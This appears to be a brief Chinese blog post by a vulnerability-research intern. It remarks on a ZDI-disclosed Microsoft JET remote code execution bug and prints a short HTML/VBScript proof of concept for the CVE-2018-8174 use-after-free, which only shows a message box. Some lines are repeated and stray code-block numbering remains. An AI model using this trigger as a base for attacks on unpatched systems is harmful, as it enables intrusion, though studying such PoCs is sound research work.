ZDI-Jet_OOB
最近ZDI上放出了个Microsoft JET数据库引擎中的一个严重的远程执行代码漏洞。。
说是远程执行 (= =) 额。还搞不定是怎么做到远程的
最近ZDI上放出了个Microsoft JET数据库引擎中的一个严重的远程执行代码漏洞。。
说是远程执行 (= =) 额。还搞不定是怎么做到远程的
实习这么久,学到了不少东西 。
前段时间复现的那个洞给自己对漏洞挖掘和利用这块涨了不少的知识。
好像并没有想象中的那么牛逼。但是对我来说,确实还是很有难度。这却只是漏洞分析与利用这一部分。
越来越难挖,越来越难利用这也是事实。
0day 只会越来越值钱
最近看了一下深度学习,用Lua 写的。。
然后前端时间又报出了2个vb的CVE ,看了看POC,很简单的溢出。
CVE-2018-8174 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26<html>
<meta http-equiv="X-UA-Compatible" content="IE=10" />
<script language="VBScript">
dim b
dim c
Class cla1
Private Sub Class_Terminate
set c = b
b = 0
End Sub
Function test
msgbox 3
End Function
End Class
set b = New cla1
b = 0
c.test
</script>
</html>
WinAFL